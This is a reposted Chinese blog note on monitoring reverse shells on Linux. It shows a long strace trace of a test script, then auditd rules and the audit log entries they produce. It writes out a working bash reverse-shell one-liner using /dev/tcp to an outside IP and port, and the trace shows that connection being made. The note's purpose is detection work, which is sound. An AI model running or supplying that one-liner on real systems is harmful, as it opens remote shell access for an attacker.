反弹shell监控

转自:http://pirogue.org/2017/07/25/reverse-shell/

一、跟踪系统调用

1. strace bash test.sh

root@Kali:~/pirogue/reverse_shell# strace bash test.sh 
execve("/bin/bash", ["bash", "test.sh"], [/* 50 vars */]) = 0
brk(NULL) = 0x7a2000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb87000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=128554, ...}) = 0
mmap(NULL, 128554, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb67000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libtinfo.so.5", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\315\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=170776, ...}) = 0
mmap(NULL, 2267936, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd73d000
mprotect(0x7fcafd762000, 2097152, PROT_NONE) = 0
mmap(0x7fcafd962000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x25000) = 0x7fcafd962000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200\r\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=14640, ...}) = 0
mmap(NULL, 2109680, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd539000
mprotect(0x7fcafd53c000, 2093056, PROT_NONE) = 0
mmap(0x7fcafd73b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7fcafd73b000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\3\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689360, ...}) = 0
mmap(NULL, 3795360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd19a000
mprotect(0x7fcafd32f000, 2097152, PROT_NONE) = 0
mmap(0x7fcafd52f000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7fcafd52f000
mmap(0x7fcafd535000, 14752, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fcafd535000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb65000
arch_prctl(ARCH_SET_FS, 0x7fcafdb65b40) = 0
mprotect(0x7fcafd52f000, 16384, PROT_READ) = 0
mprotect(0x7fcafd73b000, 4096, PROT_READ) = 0
mprotect(0x7fcafd962000, 16384, PROT_READ) = 0
mprotect(0x700000, 12288, PROT_READ) = 0
mprotect(0x7fcafdb8a000, 4096, PROT_READ) = 0
munmap(0x7fcafdb67000, 128554) = 0
open("/dev/tty", O_RDWR|O_NONBLOCK) = 3
close(3) = 0
brk(NULL) = 0x7a2000
brk(0x7a3000) = 0x7a3000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
brk(0x7a4000) = 0x7a4000
open("/usr/share/locale/locale.alias", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2995, ...}) = 0
brk(0x7a6000) = 0x7a6000
read(3, "# Locale name alias data base.\n#"..., 4096) = 2995
brk(0x7a7000) = 0x7a7000
brk(0x7a8000) = 0x7a8000
read(3, "", 4096) = 0
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=368, ...}) = 0
mmap(NULL, 368, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb86000
close(3) = 0
open("/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26258, ...}) = 0
mmap(NULL, 26258, PROT_READ, MAP_SHARED, 3, 0) = 0x7fcafdb7f000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=23, ...}) = 0
mmap(NULL, 23, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7e000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0
mmap(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7d000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=167, ...}) = 0
mmap(NULL, 167, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7c000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_NAME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_NAME", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=77, ...}) = 0
mmap(NULL, 77, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7b000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_PAPER", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_PAPER", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=34, ...}) = 0
mmap(NULL, 34, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7a000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
close(3) = 0
open("/usr/lib/locale/en_US.utf8/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=57, ...}) = 0
mmap(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb79000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=286, ...}) = 0
mmap(NULL, 286, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb78000
close(3) = 0
brk(0x7a9000) = 0x7a9000
open("/usr/lib/locale/en_US.UTF-8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=1244054, ...}) = 0
mmap(NULL, 1244054, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafda35000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_TIME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_TIME", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2454, ...}) = 0
mmap(NULL, 2454, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb77000
close(3) = 0
brk(0x7aa000) = 0x7aa000
open("/usr/lib/locale/en_US.UTF-8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=54, ...}) = 0
mmap(NULL, 54, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb76000
close(3) = 0
open("/usr/lib/locale/en_US.UTF-8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=328180, ...}) = 0
mmap(NULL, 328180, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafd9e4000
close(3) = 0
brk(0x7ab000) = 0x7ab000
getuid() = 0
getgid() = 0
geteuid() = 0
getegid() = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
ioctl(-1, TIOCGPGRP, 0x7ffeed7229ac) = -1 EBADF (Bad file descriptor)
sysinfo({uptime=195741, loads=[21312, 14080, 6432], totalram=4148080640, freeram=202342400, sharedram=510382080, bufferram=24547328, totalswap=2145382400, freeswap=1889628160, procs=584, totalhigh=0, freehigh=0, mem_unit=1}) = 0
brk(0x7ac000) = 0x7ac000
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
uname({sysname="Linux", nodename="Kali", ...}) = 0
brk(0x7b0000) = 0x7b0000
brk(0x7b2000) = 0x7b2000
brk(0x7b4000) = 0x7b4000
brk(0x7b5000) = 0x7b5000
brk(0x7b6000) = 0x7b6000
brk(0x7b7000) = 0x7b7000
brk(0x7b8000) = 0x7b8000
stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getpid() = 4833
brk(0x7b9000) = 0x7b9000
getppid() = 4831
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/usr/local/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid() = 0
getegid() = 0
getuid() = 0
getgid() = 0
access("/bin/bash", X_OK) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid() = 0
getegid() = 0
getuid() = 0
getgid() = 0
access("/bin/bash", R_OK) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid() = 0
getegid() = 0
getuid() = 0
getgid() = 0
access("/bin/bash", X_OK) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid() = 0
getegid() = 0
getuid() = 0
getgid() = 0
access("/bin/bash", R_OK) = 0
getpid() = 4833
brk(0x7ba000) = 0x7ba000
brk(0x7bb000) = 0x7bb000
getpgrp() = 4831
ioctl(2, TIOCGPGRP, [4831]) = 0
rt_sigaction(SIGCHLD, {sa_handler=0x44cf90, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
getrlimit(RLIMIT_NPROC, {rlim_cur=15710, rlim_max=15710}) = 0
brk(0x7bc000) = 0x7bc000
brk(0x7bd000) = 0x7bd000
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
brk(0x7be000) = 0x7be000
open("test.sh", O_RDONLY) = 3
stat("test.sh", {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
ioctl(3, TCGETS, 0x7ffeed722940) = -1 ENOTTY (Inappropriate ioctl for device)
lseek(3, 0, SEEK_CUR) = 0
read(3, "exec 9<> /dev/tcp/130.182.116.111"..., 80) = 73
lseek(3, 0, SEEK_SET) = 0
getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=4*1024}) = 0
fcntl(255, F_GETFD) = -1 EBADF (Bad file descriptor)
dup2(3, 255) = 255
close(3) = 0
fcntl(255, F_SETFD, FD_CLOEXEC) = 0
fcntl(255, F_GETFL) = 0x8000 (flags O_RDONLY|O_LARGEFILE)
fstat(255, {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
lseek(255, 0, SEEK_CUR) = 0
brk(0x7bf000) = 0x7bf000
read(255, "exec 9<> /dev/tcp/130.182.116.111"..., 73) = 73
brk(0x7c0000) = 0x7c0000
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(2323), sin_addr=inet_addr("130.182.116.111")}, 16) = 0
fcntl(9, F_GETFD) = -1 EBADF (Bad file descriptor)
dup2(3, 9) = 9
close(3) = 0
fcntl(0, F_GETFD) = 0
fcntl(0, F_DUPFD, 10) = 10
fcntl(0, F_GETFD) = 0
fcntl(10, F_SETFD, FD_CLOEXEC) = 0
dup2(9, 0) = 0
fcntl(9, F_GETFD) = 0
close(10) = 0
fcntl(1, F_GETFD) = 0
fcntl(1, F_DUPFD, 10) = 10
fcntl(1, F_GETFD) = 0
fcntl(10, F_SETFD, FD_CLOEXEC) = 0
dup2(9, 1) = 1
fcntl(9, F_GETFD) = 0
fcntl(2, F_GETFD) = 0
fcntl(2, F_DUPFD, 10) = 11
fcntl(2, F_GETFD) = 0
fcntl(11, F_SETFD, FD_CLOEXEC) = 0
dup2(1, 2) = 2
fcntl(1, F_GETFD) = 0
close(11) = 0
close(10) = 0
brk(0x7c1000) = 0x7c1000
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7fcafdb65e10) = 4834
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], 0, NULL) = 4834
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4834, si_uid=0, si_status=127, si_utime=0, si_stime=0} ---
wait4(-1, 0x7ffeed722010, WNOHANG, NULL) = -1 ECHILD (No child processes)
rt_sigreturn({mask=[]}) = 0
read(255, "", 73) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
exit_group(127) = ?
+++ exited with 127 +++

2. strace -c bash test.sh

reverse-shell

二、audit监控分析

1. audit相关资料

2. 测试audit监控规则

auditctl -A exit,always -S connect
auditctl -a exit,always -F arch=b64 -F a0=2 -F a1=1 -S socket -k CONNECTION
auditctl -a exit,always -F arch=b64 -S connect

1) auditctl -a exit,always -F arch=b64 -S connect

root@Kali:~/pirogue/reverse_shell# auditctl -l
-a always,exit -F arch=b64 -S connect

回显:

tailf /var/log/audit/audit.log

type=CONFIG_CHANGE msg=audit(1500974819.373:24): auid=0 ses=3 op="add_rule" key=(null) list=4 res=1
  • bash test.sh

回显:

tailf /var/log/audit/audit.log

type=SYSCALL msg=audit(1500975246.989:30): arch=c000003e syscall=42 success=yes exit=0 a0=3 a1=1c052b8 a2=10 a3=129 items=0 ppid=4722 pid=7736 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
type=SOCKADDR msg=audit(1500975246.989:30): saddr=0200091385827E520000000000000000
type=PROCTITLE msg=audit(1500975246.989:30): proctitle=6261736800746573742E7368
  • exec 9<> /dev/tcp/130.182.116.111/2323;exec 0<&9;exec 1>&9 2>&1;/bin/bash

直接执行反弹命令,并没有audit到网络连接行为。但反弹shell中执行:whoami,出现回显。

type=SYSCALL msg=audit(1500975460.957:49): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798490 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=SOCKADDR msg=audit(1500975460.957:49): saddr=01002F7661722F72756E2F6E7363642F736F636B657400000000000000000000E029ECE3CD550000002CECE3CD55000000000000000000004B389E12077F00008028ECE3CD55000080988C12077F00001C000000000000004073C312077F0000F386799CFE7F0000100000000000
type=CWD msg=audit(1500975460.957:49): cwd="/root"
type=PATH msg=audit(1500975460.957:49): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
type=PROCTITLE msg=audit(1500975460.957:49): proctitle="whoami"
type=SYSCALL msg=audit(1500975460.961:50): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798640 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=SOCKADDR msg=audit(1500975460.961:50): saddr=01002F7661722F72756E2F6E7363642F736F636B65740000109AE512077F000001000000000000000000000000000000C887799CFE7F0000D120C412077F00000100000000000000109AE512077F0000010000000000000000000000000000000100000000000000000000000000
type=CWD msg=audit(1500975460.961:50): cwd="/root"
type=PATH msg=audit(1500975460.961:50): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
type=PROCTITLE msg=audit(1500975460.961:50): proctitle="whoami"

2) auditctl -a always,exit -F arch=b64 -S socket

type=SYSCALL msg=audit(1500976257.753:113): arch=c000003e syscall=41 success=yes exit=3 a0=2 a1=1 a2=6 a3=2b items=0 ppid=2409 pid=7894 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
type=PROCTITLE msg=audit(1500976257.753:113): proctitle="/usr/lib/gnome-terminal/gnome-terminal-server"

执行反弹命令直接监控到日志如上。输入whoami,也可监控到回显:

type=SYSCALL msg=audit(1500976407.153:125): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=PROCTITLE msg=audit(1500976407.153:125): proctitle="whoami"
type=SYSCALL msg=audit(1500976407.153:126): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=PROCTITLE msg=audit(1500976407.153:126): proctitle="whoami"

待续…

posted @ 2018-01-13 20:02  &#127821;  阅读(357)  评论(0编辑  收藏  举报